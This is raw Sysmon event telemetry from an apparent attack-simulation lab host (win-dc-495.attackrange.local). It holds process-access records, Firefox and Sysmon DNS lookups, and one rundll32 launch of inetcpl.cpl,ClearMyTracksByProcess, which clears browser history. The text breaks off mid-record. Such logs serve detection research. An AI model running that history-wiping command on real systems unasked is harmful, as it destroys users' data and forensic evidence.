14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b42|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.852{59A5CD1D-9460-6005-3A05-00000000A301}5464C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8388616 WinX:0 WinY:0 IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 22542200x800000000000000017134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.284{59A5CD1D-8E56-6005-2E00-00000000A301}2464151.80.216.34.in-addr.arpa.0type: 12 ec2-34-216-80-151.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.282{59A5CD1D-8E56-6005-2E00-00000000A301}2464255.168.40.52.in-addr.arpa.0type: 12 ec2-52-40-168-255.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.279{59A5CD1D-8E56-6005-2E00-00000000A301}2464190.114.165.35.in-addr.arpa.0type: 12 ec2-35-165-114-190.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}246414.250.239.44.in-addr.arpa.0type: 12 ec2-44-239-250-14.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}246433.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-33.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}2464111.177.222.52.in-addr.arpa.0type: 12 server-52-222-177-111.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.278{59A5CD1D-8E56-6005-2E00-00000000A301}2464143.169.164.54.in-addr.arpa.0type: 12 ec2-54-164-169-143.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.277{59A5CD1D-8E56-6005-2E00-00000000A301}246464.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-64.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.276{59A5CD1D-8E56-6005-2E00-00000000A301}246448.163.55.23.in-addr.arpa.0type: 12 a23-55-163-48.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.042{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.041{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com013.227.134.176;13.227.134.206;13.227.134.67;13.227.134.71;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.040{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com0::ffff:13.227.134.71;::ffff:13.227.134.176;::ffff:13.227.134.206;::ffff:13.227.134.67;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.900{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-protection.cdn.mozilla.net0type: 5 d1zkz3k4cclnv6.cloudfront.net;99.84.90.33;99.84.90.50;99.84.90.122;99.84.90.20;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.897{59A5CD1D-945A-6005-3305-00000000A301}7052d228z91au11ukj.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.896{59A5CD1D-945A-6005-3305-00000000A301}7052d228z91au11ukj.cloudfront.net052.222.177.13;52.222.177.40;52.222.177.62;52.222.177.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.895{59A5CD1D-945A-6005-3305-00000000A301}7052snippets.cdn.mozilla.net0type: 5 d228z91au11ukj.cloudfront.net;::ffff:52.222.177.111;::ffff:52.222.177.13;::ffff:52.222.177.40;::ffff:52.222.177.62;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.872{59A5CD1D-945A-6005-3305-00000000A301}7052prod.pocket.prod.cloudops.mozgcp.net02600:1901:0:524c::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.870{59A5CD1D-945A-6005-3305-00000000A301}7052d1zkz3k4cclnv6.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.866{59A5CD1D-945A-6005-3305-00000000A301}7052d1zkz3k4cclnv6.cloudfront.net099.84.90.20;99.84.90.33;99.84.90.50;99.84.90.122;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.865{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-protection.cdn.mozilla.net0type: 5 d1zkz3k4cclnv6.cloudfront.net;::ffff:99.84.90.122;::ffff:99.84.90.20;::ffff:99.84.90.33;::ffff:99.84.90.50;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.854{59A5CD1D-945A-6005-3305-00000000A301}7052proxyserverecs-1736642167.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.852{59A5CD1D-945A-6005-3305-00000000A301}7052proxyserverecs-1736642167.us-east-1.elb.amazonaws.com054.209.196.141;3.211.216.81;3.232.128.142;34.192.53.143;52.20.179.133;52.86.239.227;54.147.76.56;54.164.169.143;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.852{59A5CD1D-945A-6005-3305-00000000A301}7052prod.pocket.prod.cloudops.mozgcp.net034.120.5.221;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.851{59A5CD1D-945A-6005-3305-00000000A301}7052spocs.getpocket.com0type: 5 proxyserverecs-1736642167.us-east-1.elb.amazonaws.com;::ffff:54.164.169.143;::ffff:54.209.196.141;::ffff:3.211.216.81;::ffff:3.232.128.142;::ffff:34.192.53.143;::ffff:52.20.179.133;::ffff:52.86.239.227;::ffff:54.147.76.56;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.851{59A5CD1D-945A-6005-3305-00000000A301}7052getpocket.cdn.mozilla.net0type: 5 getpocket-cdn.prod.mozaws.net;type: 5 prod.pocket.prod.cloudops.mozgcp.net;::ffff:34.120.5.221;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.780{59A5CD1D-945A-6005-3305-00000000A301}7052dzlgdtxcws9pb.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.775{59A5CD1D-945A-6005-3305-00000000A301}7052dzlgdtxcws9pb.cloudfront.net0143.204.90.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.774{59A5CD1D-945A-6005-3305-00000000A301}7052www.firefox.com0type: 5 fxc-prod.moz.works;type: 5 dzlgdtxcws9pb.cloudfront.net;::ffff:143.204.90.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.743{59A5CD1D-945A-6005-3305-00000000A301}7052fennec-catalog-cdn.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.740{59A5CD1D-945A-6005-3305-00000000A301}7052fennec-catalog-cdn.prod.mozaws.net013.227.156.80;13.227.156.117;13.227.156.12;13.227.156.64;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.739{59A5CD1D-945A-6005-3305-00000000A301}7052firefox-settings-attachments.cdn.mozilla.net0type: 5 fennec-catalog-cdn.prod.mozaws.net;::ffff:13.227.156.64;::ffff:13.227.156.80;::ffff:13.227.156.117;::ffff:13.227.156.12;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.531{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net02a02:26f0:eb::214:bd82;2a02:26f0:eb::214:bd5a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.529{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net023.55.163.58;23.55.163.48;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.529{59A5CD1D-945A-6005-3305-00000000A301}7052r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.55.163.48;::ffff:23.55.163.58;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.522{59A5CD1D-945A-6005-3305-00000000A301}7052autopush.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.508{59A5CD1D-945A-6005-3305-00000000A301}7052autopush.prod.mozaws.net035.165.114.190;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.507{59A5CD1D-945A-6005-3305-00000000A301}7052push.services.mozilla.com0type: 5 autopush.prod.mozaws.net;::ffff:35.165.114.190;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.419{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.414{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.prod.mozaws.net044.233.8.168;44.236.152.85;52.36.207.147;52.43.72.100;34.216.48.72;34.216.80.151;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.414{59A5CD1D-945A-6005-3305-00000000A301}7052shavar.services.mozilla.com0type: 5 shavar.prod.mozaws.net;::ffff:34.216.80.151;::ffff:44.233.8.168;::ffff:44.236.152.85;::ffff:52.36.207.147;::ffff:52.43.72.100;::ffff:34.216.48.72;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.365{59A5CD1D-945A-6005-3305-00000000A301}7052locprod2-elb-us-west-2.prod.mozaws.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.363{59A5CD1D-945A-6005-3305-00000000A301}7052locprod2-elb-us-west-2.prod.mozaws.net052.42.151.74;34.210.121.31;34.216.198.143;44.237.173.75;44.238.41.205;52.41.252.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.362{59A5CD1D-945A-6005-3305-00000000A301}7052location.services.mozilla.com0type: 5 locprod2-elb-us-west-2.prod.mozaws.net;::ffff:52.41.252.192;::ffff:52.42.151.74;::ffff:34.210.121.31;::ffff:34.216.198.143;::ffff:44.237.173.75;::ffff:44.238.41.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.286{59A5CD1D-8E56-6005-2E00-00000000A301}246436.75.98.34.in-addr.arpa.0type: 12 36.75.98.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 10341000x800000000000000017090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.661{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.614{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.614{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.598{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.583{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.583{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.567{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.567{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.548{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 